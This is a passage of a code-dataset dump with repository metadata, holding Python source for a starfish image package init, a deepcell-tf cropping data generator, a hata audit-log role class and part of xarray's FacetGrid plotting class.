hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed674c4c205440cb16d99ce07f8f85acd3899de0 | 186 | py | Python | starfish/image/__init__.py | ttung/starfish | 1bd8abf55a335620e4b20abb041f478334714081 | [
"MIT"
] | null | null | null | starfish/image/__init__.py | ttung/starfish | 1bd8abf55a335620e4b20abb041f478334714081 | [
"MIT"
] | null | null | null | starfish/image/__init__.py | ttung/starfish | 1bd8abf55a335620e4b20abb041f478334714081 | [
"MIT"
] | null | null | null | from ._filter import Filter
from ._registration._apply_transform import ApplyTransform
from ._registration._learn_transform import LearnTransform
from ._segmentation import Segmentation
| 37.2 | 58 | 0.88172 |
d2c67d44136721b4374eb1901eaa4ab0c2704ad7 | 22,206 | py | Python | deepcell/image_generators/cropping.py | BioMeasure/deepcell-tf | e8912c9e4a7160900e8d9dc2616a03dfa47fd53f | [
"Apache-2.0"
] | 1 | 2020-12-05T14:59:18.000Z | 2020-12-05T14:59:18.000Z | deepcell/image_generators/cropping.py | BioMeasure/deepcell-tf | e8912c9e4a7160900e8d9dc2616a03dfa47fd53f | [
"Apache-2.0"
] | null | null | null | deepcell/image_generators/cropping.py | BioMeasure/deepcell-tf | e8912c9e4a7160900e8d9dc2616a03dfa47fd53f | [
"Apache-2.0"
] | null | null | null | # Copyright 2016-2020 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/deepcell-tf/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Semantic segmentation data generators with cropping."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import warnings
import numpy as np
from tensorflow.python.keras.preprocessing.image import array_to_img
from deepcell.image_generators import SemanticDataGenerator, SemanticIterator
try:
import scipy
# scipy.linalg cannot be accessed until explicitly imported
from scipy import linalg
# scipy.ndimage cannot be accessed until explicitly imported
from scipy import ndimage
except ImportError:
scipy = None
from deepcell.image_generators import _transform_masks
class CroppingIterator(SemanticIterator):
    """Iterator yielding data from Numpy arrays (X and y).
    Args:
        train_dict (dict): Consists of numpy arrays for ``X`` and ``y``.
        image_data_generator (ImageDataGenerator): For random transformations
            and normalization.
        batch_size (int): Size of a batch.
        min_objects (int): Images with fewer than ``min_objects`` are ignored.
        shuffle (bool): Whether to shuffle the data between epochs.
        seed (int): Random seed for data shuffling.
        data_format (str): A string, one of ``channels_last`` (default)
            or ``channels_first``. The ordering of the dimensions in the
            inputs. ``channels_last`` corresponds to inputs with shape
            ``(batch, height, width, channels)`` while ``channels_first``
            corresponds to inputs with shape
            ``(batch, channels, height, width)``.
        save_to_dir (str): Optional directory where to save the pictures
            being yielded, in a viewable format. This is useful
            for visualizing the random transformations being
            applied, for debugging purposes.
        save_prefix (str): Prefix to use for saving sample
            images (if ``save_to_dir`` is set).
        save_format (str): Format to use for saving sample images
            (if ``save_to_dir`` is set).
        crop_size (tuple): Optional parameter specifying size of crop to take from image
    """
    # NOTE(review): ``transforms`` / ``transforms_kwargs`` use mutable default
    # arguments. They are only forwarded to the parent class here, but if any
    # downstream code mutates them the default would be shared across
    # instances -- consider None sentinels.
    def __init__(self,
                 train_dict,
                 image_data_generator,
                 batch_size=1,
                 shuffle=False,
                 transforms=['outer-distance'],
                 transforms_kwargs={},
                 seed=None,
                 min_objects=3,
                 data_format='channels_last',
                 save_to_dir=None,
                 save_prefix='',
                 save_format='png',
                 crop_size=None):
        super(CroppingIterator, self).__init__(
            train_dict=train_dict,
            image_data_generator=image_data_generator,
            batch_size=batch_size,
            shuffle=shuffle,
            transforms=transforms,
            transforms_kwargs=transforms_kwargs,
            seed=seed,
            min_objects=min_objects,
            data_format=data_format,
            save_to_dir=save_to_dir,
            save_prefix=save_prefix,
            save_format=save_format,
        )
        # set output size of image based on crop_size; when no crop is
        # requested, the output size is simply the spatial dims of self.x
        # (channel_axis == 3 means channels_last -> rows/cols are axes 1:3).
        if crop_size is not None:
            output_size = crop_size
        else:
            output_size = self.x.shape[1:3] if self.channel_axis == 3 else self.x.shape[2:4]
        self.output_size = output_size
    def _get_batches_of_transformed_samples(self, index_array):
        """Build one batch: transform labels, randomly transform/crop each
        (x, y) pair via the attached generator, and optionally save debug
        images to ``save_to_dir``.
        Returns:
            tuple: ``(batch_x, batch_y)`` where ``batch_y`` is a list of
            arrays, one per semantic transform.
        """
        # set output size based on output shape and # of channels
        if self.channel_axis == 3:
            x_shape = tuple([len(index_array)] + list(self.output_size) + [self.x.shape[3]])
        else:
            x_shape = tuple([len(index_array)] + [self.x.shape[1]] + list(self.output_size))
        batch_x = np.zeros(x_shape, dtype=self.x.dtype)
        batch_y = []
        for i, j in enumerate(index_array):
            x = self.x[j]
            # _transform_labels expects batch dimension
            y_semantic_list = self._transform_labels(self.y[j:j + 1])
            # initialize batch_y lazily: output channel counts are only known
            # after the first label transform
            if len(batch_y) == 0:
                for ys in y_semantic_list:
                    if self.data_format == 'channels_first':
                        shape = tuple([len(index_array), ys.shape[1]] + list(self.output_size))
                    else:
                        shape = tuple([len(index_array)] + list(self.output_size) + [ys.shape[-1]])
                    batch_y.append(np.zeros(shape, dtype=ys.dtype))
            # random_transform does not expect batch dimension
            y_semantic_list = [ys[0] for ys in y_semantic_list]
            # Apply transformation (includes the random crop when the
            # generator was built with a crop_size)
            x, y_semantic_list = self.image_data_generator.random_transform(
                x, y_semantic_list)
            x = self.image_data_generator.standardize(x)
            batch_x[i] = x
            for k, ys in enumerate(y_semantic_list):
                batch_y[k][i] = ys
        # Optionally dump the first channel of each x (and the argmax of each
        # y) as images for visual debugging.
        if self.save_to_dir:
            for i, j in enumerate(index_array):
                if self.data_format == 'channels_first':
                    img_x = np.expand_dims(batch_x[i, 0, ...], 0)
                else:
                    img_x = np.expand_dims(batch_x[i, ..., 0], -1)
                img = array_to_img(img_x, self.data_format, scale=True)
                fname = '{prefix}_{index}_{hash}.{format}'.format(
                    prefix=self.save_prefix,
                    index=j,
                    hash=np.random.randint(1e4),
                    format=self.save_format)
                img.save(os.path.join(self.save_to_dir, fname))
                if self.y is not None:
                    # Save argmax of y batch
                    for k, y_sem in enumerate(batch_y):
                        if y_sem[i].shape[self.channel_axis - 1] == 1:
                            img_y = y_sem[i]
                        else:
                            # collapse one-hot channels, then restore the
                            # channel axis so array_to_img accepts it
                            img_y = np.argmax(y_sem[i],
                                              axis=self.channel_axis - 1)
                            img_y = np.expand_dims(img_y,
                                                   axis=self.channel_axis - 1)
                        img = array_to_img(img_y, self.data_format, scale=True)
                        fname = 'y_{sem}_{prefix}_{index}_{hash}.{format}'.format(
                            sem=k,
                            prefix=self.save_prefix,
                            index=j,
                            hash=np.random.randint(1e4),
                            format=self.save_format)
                        img.save(os.path.join(self.save_to_dir, fname))
        return batch_x, batch_y
class CroppingDataGenerator(SemanticDataGenerator):
    """Generates batches of tensor image data with real-time data augmentation.
    The data will be looped over (in batches). When ``crop_size`` is given,
    a random crop of that size is taken from every image as part of each
    random transform.
    Args:
        featurewise_center (bool): Set input mean to 0 over the dataset,
            feature-wise.
        samplewise_center (bool): Set each sample mean to 0.
        featurewise_std_normalization (bool): Divide inputs by std
            of the dataset, feature-wise.
        samplewise_std_normalization (bool): Divide each input by its std.
        zca_epsilon (float): Epsilon for ZCA whitening. Default is 1e-6.
        zca_whitening (bool): Apply ZCA whitening.
        rotation_range (int): Degree range for random rotations.
        width_shift_range (float): 1-D array-like or int
            - float: fraction of total width, if < 1, or pixels if >= 1.
            - 1-D array-like: random elements from the array.
            - int: integer number of pixels from interval
              ``(-width_shift_range, +width_shift_range)``
            - With ``width_shift_range=2`` possible values are integers
              ``[-1, 0, +1]``, same as with ``width_shift_range=[-1, 0, +1]``,
              while with ``width_shift_range=1.0`` possible values are floats
              in the interval [-1.0, +1.0).
        height_shift_range: Float, 1-D array-like or int
            - float: fraction of total height, if < 1, or pixels if >= 1.
            - 1-D array-like: random elements from the array.
            - int: integer number of pixels from interval
              ``(-height_shift_range, +height_shift_range)``
            - With ``height_shift_range=2`` possible values
              are integers ``[-1, 0, +1]``,
              same as with ``height_shift_range=[-1, 0, +1]``,
              while with ``height_shift_range=1.0`` possible values are floats
              in the interval [-1.0, +1.0).
        brightness_range (tuple): Range for picking a random brightness
            shift value, passed through to the parent generator.
        shear_range (float): Shear Intensity
            (Shear angle in counter-clockwise direction in degrees)
        zoom_range (float): float or [lower, upper], Range for random zoom.
            If a float, ``[lower, upper] = [1-zoom_range, 1+zoom_range]``.
        channel_shift_range (float): range for random channel shifts.
        fill_mode (str): One of {"constant", "nearest", "reflect" or "wrap"}.
            Default is 'nearest'. Points outside the boundaries of the input
            are filled according to the given mode:
                - 'constant': kkkkkkkk|abcd|kkkkkkkk (cval=k)
                - 'nearest': aaaaaaaa|abcd|dddddddd
                - 'reflect': abcddcba|abcd|dcbaabcd
                - 'wrap': abcdabcd|abcd|abcdabcd
        cval (float): Value used for points outside the boundaries
            when ``fill_mode = "constant"``.
        horizontal_flip (bool): Randomly flip inputs horizontally.
        vertical_flip (bool): Randomly flip inputs vertically.
        rescale: rescaling factor. Defaults to None. If None or 0, no rescaling
            is applied, otherwise we multiply the data by the value provided
            (before applying any other transformation).
        preprocessing_function: function that will be implied on each input.
            The function will run after the image is resized and augmented.
            The function should take one argument:
            one image (Numpy tensor with rank 3),
            and should output a Numpy tensor with the same shape.
        data_format (str): A string, one of ``channels_last`` (default)
            or ``channels_first``. The ordering of the dimensions in the
            inputs. ``channels_last`` corresponds to inputs with shape
            ``(batch, height, width, channels)`` while ``channels_first``
            corresponds to inputs with shape
            ``(batch, channels, height, width)``.
        validation_split (float): Fraction of images reserved for validation
            (strictly between 0 and 1).
        interpolation_order (int): Spline interpolation order used by the
            geometric transforms.
        crop_size (tuple): Optional (row, col) size of the random crop taken
            from each image. Must be no larger than the image dimensions;
            when it equals them exactly, no cropping is performed.
    """
    def __init__(self,
                 featurewise_center=False,
                 samplewise_center=False,
                 featurewise_std_normalization=False,
                 samplewise_std_normalization=False,
                 zca_whitening=False,
                 zca_epsilon=1e-6,
                 rotation_range=0,
                 width_shift_range=0.,
                 height_shift_range=0.,
                 brightness_range=None,
                 shear_range=0.,
                 zoom_range=0.,
                 channel_shift_range=0.,
                 fill_mode='nearest',
                 cval=0.,
                 horizontal_flip=False,
                 vertical_flip=False,
                 rescale=None,
                 preprocessing_function=None,
                 data_format='channels_last',
                 validation_split=0.0,
                 interpolation_order=1,
                 crop_size=None,
                 dtype='float32'):
        super(CroppingDataGenerator, self).__init__(
            featurewise_center=featurewise_center,
            samplewise_center=samplewise_center,
            featurewise_std_normalization=featurewise_std_normalization,
            samplewise_std_normalization=samplewise_std_normalization,
            zca_whitening=zca_whitening,
            zca_epsilon=zca_epsilon,
            rotation_range=rotation_range,
            width_shift_range=width_shift_range,
            height_shift_range=height_shift_range,
            brightness_range=brightness_range,
            shear_range=shear_range,
            zoom_range=zoom_range,
            channel_shift_range=channel_shift_range,
            fill_mode=fill_mode,
            cval=cval,
            horizontal_flip=horizontal_flip,
            vertical_flip=vertical_flip,
            rescale=rescale,
            preprocessing_function=preprocessing_function,
            data_format=data_format,
            validation_split=validation_split,
            dtype=dtype)
        if crop_size is not None:
            if not isinstance(crop_size, (tuple, list)):
                raise ValueError("Crop size must be a list or tuple of row/col dimensions")
        self.crop_size = crop_size
        # tensorflow does not initialize interpolation_order, so we'll do it here
        self.interpolation_order = interpolation_order
    def flow(self,
             train_dict,
             batch_size=1,
             transforms=['outer-distance'],
             transforms_kwargs={},
             min_objects=3,
             shuffle=True,
             seed=None,
             save_to_dir=None,
             save_prefix='',
             save_format='png'):
        """Generates batches of augmented/normalized data with given arrays.
        Args:
            train_dict (dict): Consists of numpy arrays for ``X`` and ``y``.
            batch_size (int): Size of a batch. Defaults to 1.
            shuffle (bool): Whether to shuffle the data between epochs.
                Defaults to ``True``.
            seed (int): Random seed for data shuffling.
            min_objects (int): Minumum number of objects allowed per image
            save_to_dir (str): Optional directory where to save the pictures
                being yielded, in a viewable format. This is useful
                for visualizing the random transformations being
                applied, for debugging purposes.
            save_prefix (str): Prefix to use for saving sample
                images (if ``save_to_dir`` is set).
            save_format (str): Format to use for saving sample images
                (if ``save_to_dir`` is set).
        Returns:
            CroppingIterator: An ``Iterator`` yielding tuples of ``(x, y)``,
            where ``x`` is a numpy array of image data and ``y`` is list of
            numpy arrays of transformed masks of the same shape.
        """
        return CroppingIterator(
            train_dict,
            self,
            batch_size=batch_size,
            transforms=transforms,
            transforms_kwargs=transforms_kwargs,
            shuffle=shuffle,
            min_objects=min_objects,
            seed=seed,
            data_format=self.data_format,
            save_to_dir=save_to_dir,
            save_prefix=save_prefix,
            save_format=save_format,
            crop_size=self.crop_size)
    def get_random_transform(self, img_shape, seed=None):
        """Generates random parameters for a transformation, adding random
        crop indices under the ``'crop_indices'`` key when cropping is on.
        Args:
            img_shape (tuple): Shape of a single (unbatched) image.
            seed (int): Random seed forwarded to the parent implementation.
        Returns:
            dict: Parameters describing the transformation.
        Raises:
            ValueError: If ``crop_size`` matches only one image axis or
                exceeds the image dimensions.
        """
        transform_parameters = super(CroppingDataGenerator, self).get_random_transform(
            img_shape=img_shape, seed=seed)
        crop_indices = None
        if self.crop_size is not None:
            img_dims = img_shape[1:] if self.channel_axis == 1 else img_shape[:2]
            # BUGFIX: compare as tuples. ``crop_size`` may be a list, and a
            # tuple never compares equal to a list, which previously routed an
            # exactly-matching list-valued crop_size into the error branches.
            if tuple(img_dims) == tuple(self.crop_size):
                # don't need to crop
                pass
            elif img_dims[0] == self.crop_size[0] or img_dims[1] == self.crop_size[1]:
                raise ValueError('crop_size must be a subset of both axes or exactly '
                                 ' equal to image dims')
            elif img_dims[0] < self.crop_size[0] or img_dims[1] < self.crop_size[1]:
                raise ValueError('Crop dimensions must be smaller than image dimensions')
            else:
                # BUGFIX: np.random.randint's upper bound is exclusive, so +1
                # is needed for the final valid offset (dim - crop) to ever be
                # drawn; without it the bottom/right-most crop was unreachable.
                row_start = np.random.randint(0, img_dims[0] - self.crop_size[0] + 1)
                col_start = np.random.randint(0, img_dims[1] - self.crop_size[1] + 1)
                crop_indices = ([row_start, row_start + self.crop_size[0]],
                                [col_start, col_start + self.crop_size[1]])
        transform_parameters['crop_indices'] = crop_indices
        return transform_parameters
    def apply_transform(self, x, transform_parameters):
        """Applies the transformation to a single image, cropping first
        (when ``'crop_indices'`` is set) and then delegating to the parent.
        Args:
            x: Single image tensor (no batch dimension).
            transform_parameters (dict): As produced by
                ``get_random_transform``.
        Returns:
            A transformed version of the input.
        """
        if transform_parameters['crop_indices'] is not None:
            row_indices, col_indices = transform_parameters['crop_indices']
            if self.channel_axis == 1:
                x = x[:, row_indices[0]:row_indices[1], col_indices[0]:col_indices[1]]
            else:
                x = x[row_indices[0]:row_indices[1], col_indices[0]:col_indices[1], :]
        x = super(CroppingDataGenerator, self).apply_transform(
            x=x, transform_parameters=transform_parameters)
        return x
    def fit(self, x, augment=False, rounds=1, seed=None):
        """Fits the data generator to some sample data.
        This computes the internal data stats related to the
        data-dependent transformations, based on an array of sample data.
        Only required if `featurewise_center` or
        `featurewise_std_normalization` or `zca_whitening` are set to True.
        When `rescale` is set to a value, rescaling is applied to
        sample data before computing the internal data stats.
        Args:
            x: Sample data. Should have rank 4.
                In case of grayscale data,
                the channels axis should have value 1, in case
                of RGB data, it should have value 3, and in case
                of RGBA data, it should have value 4.
            augment: Boolean (default: False).
                Whether to fit on randomly augmented samples.
            rounds: Int (default: 1).
                If using data augmentation (`augment=True`),
                this is how many augmentation passes over the data to use.
            seed: Int (default: None). Random seed.
        """
        x = np.asarray(x, dtype=self.dtype)
        if x.ndim != 4:
            raise ValueError('Input to `.fit()` should have rank 4. '
                             'Got array with shape: ' + str(x.shape))
        if x.shape[self.channel_axis] not in {1, 3, 4}:
            warnings.warn(
                'Expected input to be images (as Numpy array) '
                'following the data format convention "' +
                self.data_format + '" (channels on axis ' +
                str(self.channel_axis) + '), i.e. expected '
                'either 1, 3 or 4 channels on axis ' +
                str(self.channel_axis) + '. '
                'However, it was passed an array with shape ' +
                str(x.shape) + ' (' + str(x.shape[self.channel_axis]) +
                ' channels).')
        if seed is not None:
            np.random.seed(seed)
        x = np.copy(x)
        if self.rescale:
            x *= self.rescale
        if augment:
            # adjust output shape to account for cropping in generator
            if self.crop_size is not None:
                if self.channel_axis == 1:
                    x_crop_shape = [x.shape[1]] + list(self.crop_size)
                else:
                    x_crop_shape = list(self.crop_size) + [x.shape[3]]
                ax = np.zeros(
                    tuple([rounds * x.shape[0]] + x_crop_shape),
                    dtype=self.dtype)
            else:
                ax = np.zeros(
                    tuple([rounds * x.shape[0]] + list(x.shape)[1:]),
                    dtype=self.dtype)
            for r in range(rounds):
                for i in range(x.shape[0]):
                    ax[i + r * x.shape[0]] = self.random_transform(x[i])
            x = ax
        if self.featurewise_center:
            self.mean = np.mean(x, axis=(0, self.row_axis, self.col_axis))
            broadcast_shape = [1, 1, 1]
            broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
            self.mean = np.reshape(self.mean, broadcast_shape)
            x -= self.mean
        if self.featurewise_std_normalization:
            self.std = np.std(x, axis=(0, self.row_axis, self.col_axis))
            broadcast_shape = [1, 1, 1]
            broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
            self.std = np.reshape(self.std, broadcast_shape)
            x /= (self.std + 1e-6)
        if self.zca_whitening:
            if scipy is None:
                raise ImportError('Using zca_whitening requires SciPy. '
                                  'Install SciPy.')
            flat_x = np.reshape(
                x, (x.shape[0], x.shape[1] * x.shape[2] * x.shape[3]))
            sigma = np.dot(flat_x.T, flat_x) / flat_x.shape[0]
            u, s, _ = linalg.svd(sigma)
            s_inv = 1. / np.sqrt(s[np.newaxis] + self.zca_epsilon)
            self.principal_components = (u * s_inv).dot(u.T)
| 43.972277 | 99 | 0.581329 |
1481cf55d238b458c54fbbddd274d7268d33eb1c | 1,225 | py | Python | hata/discord/guild/audit_logs/audit_log_role.py | WizzyBots/hata | f6991afc0bebf7dad932888a536f4d010f8663c7 | [
"0BSD"
] | 1 | 2022-03-02T03:59:57.000Z | 2022-03-02T03:59:57.000Z | hata/discord/guild/audit_logs/audit_log_role.py | m0nk3ybraindead/hata | f87ed3d7009eeae31d6ea158772efd33775c7b1c | [
"0BSD"
] | 1 | 2022-02-08T16:54:39.000Z | 2022-02-08T16:54:39.000Z | hata/discord/guild/audit_logs/audit_log_role.py | WizzyBots/hata | f6991afc0bebf7dad932888a536f4d010f8663c7 | [
"0BSD"
] | null | null | null | __all__ = ('AuditLogRole',)
from ...bases import DiscordEntity
from ...role import Role
class AuditLogRole(DiscordEntity):
    """
    A partial role object as it shows up inside of audit log entries.

    Parameters
    ----------
    id : `int`
        The role's identifier.
    name : `str`
        The role's name.
    """
    __slots__ = ('id', 'name')

    def __new__(cls, data):
        """
        Creates a new audit log role.

        Parameters
        ----------
        data : `dict` of (`str`, `Any`) items
            partial role data.
        """
        instance = object.__new__(cls)
        instance.id = int(data['id'])
        instance.name = data.get('name', '')
        return instance

    def __repr__(self):
        """Returns the role's representation."""
        return f'<{self.__class__.__name__} id={self.id!r}, name={self.name!r}>'

    @property
    def entity(self):
        """
        Resolves the audit log role's entity.

        If the entity is not cached creates a new.

        Returns
        -------
        role : ``Role``
        """
        return Role.precreate(self.id, name=self.name)
| 22.272727 | 80 | 0.502857 |
f133e7806a34b1a1bb2dd83ba412ec53f281d110 | 18,743 | py | Python | xarray/plot/facetgrid.py | visr/xarray | 9e8707d2041cfa038c31fc2284c1fe40bc3368e9 | [
"Apache-2.0"
] | null | null | null | xarray/plot/facetgrid.py | visr/xarray | 9e8707d2041cfa038c31fc2284c1fe40bc3368e9 | [
"Apache-2.0"
] | 1 | 2018-12-05T09:21:17.000Z | 2018-12-05T09:21:17.000Z | xarray/plot/facetgrid.py | visr/xarray | 9e8707d2041cfa038c31fc2284c1fe40bc3368e9 | [
"Apache-2.0"
] | 1 | 2020-05-29T16:17:35.000Z | 2020-05-29T16:17:35.000Z | from __future__ import absolute_import, division, print_function
import functools
import itertools
import warnings
import numpy as np
from ..core.formatting import format_item
from ..core.pycompat import getargspec
from .utils import (
_determine_cmap_params, _infer_xy_labels, import_matplotlib_pyplot,
label_from_attrs)
# Default facet-label font size.
# Overrides axes.labelsize, xtick.major.size, ytick.major.size
# from mpl.rcParams
_FONTSIZE = 'small'
# For major ticks on x, y axes
_NTICKS = 5
def _nicetitle(coord, value, maxchar, template):
    """Render ``coord`` and ``value`` into ``template``; results longer than
    ``maxchar`` are truncated with a trailing ellipsis."""
    rendered = template.format(
        coord=coord, value=format_item(value, quote_strings=False))
    if len(rendered) <= maxchar:
        return rendered
    # keep room for the three-character ellipsis
    return rendered[:maxchar - 3] + '...'
class FacetGrid(object):
"""
Initialize the matplotlib figure and FacetGrid object.
The :class:`FacetGrid` is an object that links a xarray DataArray to
a matplotlib figure with a particular structure.
In particular, :class:`FacetGrid` is used to draw plots with multiple
Axes where each Axes shows the same relationship conditioned on
different levels of some dimension. It's possible to condition on up to
two variables by assigning variables to the rows and columns of the
grid.
The general approach to plotting here is called "small multiples",
where the same kind of plot is repeated multiple times, and the
specific use of small multiples to display the same relationship
conditioned on one ore more other variables is often called a "trellis
plot".
The basic workflow is to initialize the :class:`FacetGrid` object with
the DataArray and the variable names that are used to structure the grid.
Then plotting functions can be applied to each subset by calling
:meth:`FacetGrid.map_dataarray` or :meth:`FacetGrid.map`.
Attributes
----------
axes : numpy object array
Contains axes in corresponding position, as returned from
plt.subplots
fig : matplotlib.Figure
The figure containing all the axes
name_dicts : numpy object array
Contains dictionaries mapping coordinate names to values. None is
used as a sentinel value for axes which should remain empty, ie.
sometimes the bottom right grid
"""
    def __init__(self, data, col=None, row=None, col_wrap=None,
                 sharex=True, sharey=True, figsize=None, aspect=1, size=3,
                 subplot_kws=None):
        """
        Parameters
        ----------
        data : DataArray
            xarray DataArray to be plotted
        row, col : strings
            Dimesion names that define subsets of the data, which will be drawn
            on separate facets in the grid.
        col_wrap : int, optional
            "Wrap" the column variable at this width, so that the column facets
            span multiple rows.
        sharex : bool, optional
            If true, the facets will share x axes
        sharey : bool, optional
            If true, the facets will share y axes
        figsize : tuple, optional
            A tuple (width, height) of the figure in inches.
            If set, overrides ``size`` and ``aspect``.
        aspect : scalar, optional
            Aspect ratio of each facet, so that ``aspect * size`` gives the
            width of each facet in inches
        size : scalar, optional
            Height (in inches) of each facet. See also: ``aspect``
        subplot_kws : dict, optional
            Dictionary of keyword arguments for matplotlib subplots
        """
        plt = import_matplotlib_pyplot()
        # Handle corner case of nonunique coordinates
        rep_col = col is not None and not data[col].to_index().is_unique
        rep_row = row is not None and not data[row].to_index().is_unique
        if rep_col or rep_row:
            raise ValueError('Coordinates used for faceting cannot '
                             'contain repeated (nonunique) values.')
        # single_group is the grouping variable, if there is exactly one
        if col and row:
            single_group = False
            nrow = len(data[row])
            ncol = len(data[col])
            nfacet = nrow * ncol
            if col_wrap is not None:
                warnings.warn('Ignoring col_wrap since both col and row '
                              'were passed')
        elif row and not col:
            single_group = row
        elif not row and col:
            single_group = col
        else:
            raise ValueError(
                'Pass a coordinate name as an argument for row or col')
        # Compute grid shape
        if single_group:
            nfacet = len(data[single_group])
            if col:
                # idea - could add heuristic for nice shapes like 3x4
                ncol = nfacet
            if row:
                ncol = 1
            if col_wrap is not None:
                # Overrides previous settings
                ncol = col_wrap
            nrow = int(np.ceil(nfacet / ncol))
        # Set the subplot kwargs
        subplot_kws = {} if subplot_kws is None else subplot_kws
        if figsize is None:
            # Calculate the base figure size with extra horizontal space for a
            # colorbar
            cbar_space = 1
            figsize = (ncol * size * aspect + cbar_space, nrow * size)
        fig, axes = plt.subplots(nrow, ncol,
                                 sharex=sharex, sharey=sharey, squeeze=False,
                                 figsize=figsize, subplot_kw=subplot_kws)
        # Set up the lists of names for the row and column facet variables
        col_names = list(data[col].values) if col else []
        row_names = list(data[row].values) if row else []
        if single_group:
            # Pad with None so name_dicts fills the full nrow x ncol grid;
            # None marks axes that should stay empty.
            full = [{single_group: x} for x in
                    data[single_group].values]
            empty = [None for x in range(nrow * ncol - len(full))]
            name_dicts = full + empty
        else:
            rowcols = itertools.product(row_names, col_names)
            name_dicts = [{row: r, col: c} for r, c in rowcols]
        name_dicts = np.array(name_dicts).reshape(nrow, ncol)
        # Set up the class attributes
        # ---------------------------
        # First the public API
        self.data = data
        self.name_dicts = name_dicts
        self.fig = fig
        self.axes = axes
        self.row_names = row_names
        self.col_names = col_names
        # Next the private variables
        self._single_group = single_group
        self._nrow = nrow
        self._row_var = row
        self._ncol = ncol
        self._col_var = col
        self._col_wrap = col_wrap
        self._x_var = None
        self._y_var = None
        self._cmap_extend = None
        self._mappables = []
        self._finalized = False
    @property
    def _left_axes(self):
        # Axes in the first (left-most) column of the grid.
        return self.axes[:, 0]
    @property
    def _bottom_axes(self):
        # Axes in the last (bottom) row of the grid.
        return self.axes[-1, :]
    def map_dataarray(self, func, x, y, **kwargs):
        """
        Apply a plotting function to a 2d facet's subset of the data.
        This is more convenient and less general than ``FacetGrid.map``
        Parameters
        ----------
        func : callable
            A plotting function with the same signature as a 2d xarray
            plotting method such as `xarray.plot.imshow`
        x, y : string
            Names of the coordinates to plot on x, y axes
        kwargs :
            additional keyword arguments to func
        Returns
        -------
        self : FacetGrid object
        """
        cmapkw = kwargs.get('cmap')
        colorskw = kwargs.get('colors')
        cbar_kwargs = kwargs.pop('cbar_kwargs', {})
        cbar_kwargs = {} if cbar_kwargs is None else dict(cbar_kwargs)
        if kwargs.get('cbar_ax', None) is not None:
            raise ValueError('cbar_ax not supported by FacetGrid.')
        # colors is mutually exclusive with cmap
        if cmapkw and colorskw:
            raise ValueError("Can't specify both cmap and colors.")
        # These should be consistent with xarray.plot._plot2d
        cmap_kwargs = {'plot_data': self.data.values,
                       # MPL default
                       'levels': 7 if 'contour' in func.__name__ else None,
                       'filled': func.__name__ != 'contour',
                       }
        # Forward only those kwargs that _determine_cmap_params accepts,
        # so colormap limits are computed over the WHOLE array (shared
        # scale across facets), not per subset.
        cmap_args = getargspec(_determine_cmap_params).args
        cmap_kwargs.update((a, kwargs[a]) for a in cmap_args if a in kwargs)
        cmap_params = _determine_cmap_params(**cmap_kwargs)
        if colorskw is not None:
            cmap_params['cmap'] = None
        # Order is important
        func_kwargs = kwargs.copy()
        func_kwargs.update(cmap_params)
        func_kwargs.update({'add_colorbar': False, 'add_labels': False})
        # Get x, y labels for the first subplot
        x, y = _infer_xy_labels(
            darray=self.data.loc[self.name_dicts.flat[0]], x=x, y=y,
            imshow=func.__name__ == 'imshow', rgb=kwargs.get('rgb', None))
        for d, ax in zip(self.name_dicts.flat, self.axes.flat):
            # None is the sentinel value
            if d is not None:
                subset = self.data.loc[d]
                mappable = func(subset, x, y, ax=ax, **func_kwargs)
                self._mappables.append(mappable)
        self._cmap_extend = cmap_params.get('extend')
        self._finalize_grid(x, y)
        if kwargs.get('add_colorbar', True):
            self.add_colorbar(**cbar_kwargs)
        return self
    def map_dataarray_line(self, x=None, y=None, hue=None, **kwargs):
        """
        Apply a line plot to a 2d facet subset of the data.
        Parameters
        ----------
        x, y, hue: string
            dimension names for the axes and hues of each facet
        Returns
        -------
        self : FacetGrid object
        """
        from .plot import line, _infer_line_data
        # Suppress per-facet legends; one shared legend is drawn at the end.
        add_legend = kwargs.pop('add_legend', True)
        kwargs['add_legend'] = False
        for d, ax in zip(self.name_dicts.flat, self.axes.flat):
            # None is the sentinel value
            if d is not None:
                subset = self.data.loc[d]
                mappable = line(subset, x=x, y=y, hue=hue,
                                ax=ax, _labels=False,
                                **kwargs)
                self._mappables.append(mappable)
        # Infer shared axis/hue labels from the first facet's subset.
